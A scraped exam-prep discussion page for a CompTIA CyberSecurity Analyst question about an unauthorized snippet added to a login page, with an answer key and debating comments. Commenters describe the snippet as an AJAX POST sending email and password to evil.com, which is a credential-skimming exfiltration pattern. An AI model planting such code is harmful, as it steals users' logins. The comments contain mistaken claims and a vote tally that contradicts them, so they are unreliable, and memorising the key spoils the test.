exam questions

Exam CS0-003 All Questions

View all questions & answers for the CS0-003 exam

Exam CS0-003 topic 1 question 138 discussion

Actual exam question from CompTIA's CS0-003
Question #: 138
Topic #: 1
[All CS0-003 Questions]

A security analyst at a company is reviewing an alert from the file integrity monitoring indicating a mismatch in the login. html file hash. After comparing the code with the previous version of the page source code, the analyst found the following code snippet added:



Which of the following best describes the activity the analyst has observed?

  • A. Obfuscated links
  • B. Exfiltration
  • C. Unauthorized changes
  • D. Beaconing
Show Suggested Answer Hide Answer
Suggested Answer: C 🗳️

Comments

Chosen Answer:
This is a voting comment (?). It is better to Upvote an existing comment if you don't have anything to add.
Switch to a voting comment New
throughthefray
Highly Voted 1 year, 4 months ago
Selected Answer: B
Yikes... It looks like its both B and C. Ill go B for the follwing reason though: Sure we know that its a change thats been made. (clearly indicated by the file integrity warning and the mismatch of the hash) but the question asked about what was observed, presumably within the altered code. Lets break it down: $.ajax(: This initiates an AJAX request using jQuery. dataType: 'JSON',: Specifies that the expected data type of the server response is JSON. url: 'https://evil.com/finish.php?x=ZXZpbA==',: Sets the URL to which the AJAX request will be sent type: 'POST': Specifies that the HTTP request method should be POST Everything after "data" is the credentials that will be submitted along with the above request. This is clear Exfiltration.
upvoted 14 times
...
biggydanny
Highly Voted 1 year ago
Selected Answer: C
While the unauthorized code snippet could potentially be used for exfiltration, the primary activity observed by the analyst is the unauthorized change to the login.html file. Exfiltration refers to the actual act of data being transferred out of the system, which hasn’t been confirmed in this scenario yet. The unauthorized change could indeed lead to exfiltration if the malicious code is executed and starts sending data to an external source. However, at this point, the analyst has only observed the unauthorized change, not the actual exfiltration of data. So I think the most accurate description of the observed activity is C. Unauthorized changes.
upvoted 13 times
...
f90ecff
Most Recent 3 days, 13 hours ago
Selected Answer: B
Credentials are actively being stolen which is why I believe that it is the MOST correct answer between B & C.
upvoted 1 times
...
Popeyes_Chicken
3 months, 1 week ago
Selected Answer: B
If the analyst is viewing this log, the unauthorized change has already been made and they are witnessing data exfiltration to the malicious site shown. C is a decent red herring though!
upvoted 2 times
...
Eluis007
5 months, 4 weeks ago
Selected Answer: C
Let’s focus on the question: Which of the following best describes the activity observed by the analyst? Where in the scenario do you see evidence that the analyst detected exfiltration? The appropriate answer is C.
upvoted 2 times
...
hashed_pony
6 months ago
Selected Answer: C
Definitely C. Can't be B because exfiltration would give us a "GET" request, not a "POST" request.
upvoted 3 times
...
cy_analyst
6 months, 2 weeks ago
Selected Answer: B
This snippet is attempting to steal a user's email and password by sending it to a malicious server .when the user submits their login information. Essentially, it captures the email and password fields and sends them to an attacker-controlled site for exfiltration. This is a typical credential-stealing attack.
upvoted 1 times
cy_analyst
6 months, 1 week ago
Unauthorized changes: While this code represents unauthorized changes to the file, the primary activity here is the exfiltration of credentials, which is the bigger concern in this context
upvoted 1 times
...
...
SH_
7 months ago
Selected Answer: C
Unauthorised changes is the activity that has happened.
upvoted 2 times
...
a3432e2
9 months ago
Selected Answer: B
Question asked about what is in front of you. B. Exfiltration
upvoted 2 times
...
boog
10 months ago
Selected Answer: B
From claude.AI B. Exfiltration Here's why this is the most accurate description: 1. Data Transmission: The code snippet shows an AJAX request being made to send data to an external server (https://evil.com/finish.php). 2. Sensitive Information: The data being sent includes an email address and password, which are typically considered sensitive information. 3. Unauthorized Destination: The URL "https://evil.com" suggests that this is not a legitimate company domain, but rather a malicious endpoint. 4. POST Request: The use of a POST request type indicates that data is being sent to the server, not just retrieved. 5. Encoding: The presence of "ZXZpbA==" in the URL suggests base64 encoding, which is often used to obfuscate data in transit. This code is clearly designed to send user credentials to an unauthorized external server, which constitutes data exfiltration - the unauthorized transfer of data from a computer or other device to a location controlled by a malicious actor.
upvoted 9 times
...
499f1a0
10 months, 2 weeks ago
Selected Answer: C
It is C
upvoted 1 times
...
BanesTech
11 months, 3 weeks ago
Selected Answer: C
The activity observed by the analyst involves the addition of a code snippet that makes an AJAX POST request to an external domain (https://evil.com/finish.php) with sensitive data such as email and password. This indicates potential unauthorized changes to the login.html file, as the added code is not part of the original source code and could be malicious.
upvoted 3 times
...
CyberJackal
1 year ago
Selected Answer: C
This is an unauthorized change, as the analyst is comparing the previous code to the current and finding this new snippet.
upvoted 3 times
...
Doa
1 year, 1 month ago
Selected exfiltration It appears to be an attempt to send sensitive information (such as an email address and password) to a suspicious URL (https://evil.com/finish.php?x=zxzpbA==) via a POST request. This kind of activity is typically associated with exfiltration, which involves the unauthorized transfer of data from a system. Therefore, the best description of the observed activity would be : B. Exfiltration
upvoted 1 times
...
PeepoK
1 year, 2 months ago
Selected Answer: C
The POST is creating a new user account, indicative of unauthorized changes. There is nothing in the query related to data exfiltration...as an attacker, why would I not save the creds on my end? I wouldn't need to POST to an external .php location.
upvoted 2 times
...
indyrckstar
1 year, 2 months ago
Selected Answer: C
I believe this is C. Unauthorized changes. The reason being is POST is used for updating/modifying data.
upvoted 3 times
...
b0ad9e1
1 year, 4 months ago
Selected Answer: C
The answer is unauthorized changes. "Which of the following best describes the activity the analyst has observed?" They are asking what activity the analyst observed. The analyst did not observe exfiltration, the analyst observed the unauthorized change to the file. To me, the answer is Unauthorized Changes
upvoted 5 times
...
Community vote distribution
A (35%)
C (25%)
B (20%)
Other
Most Voted
A voting comment increases the vote count for the chosen answer by one.

Upvoting a comment with a selected answer will also increase the vote count towards that answer by one. So if you see a comment that you already agree with, you can upvote it instead of posting a new comment.

SaveCancel
Loading ...
exam
Someone Bought Contributor Access for:
SY0-701
London, 1 minute ago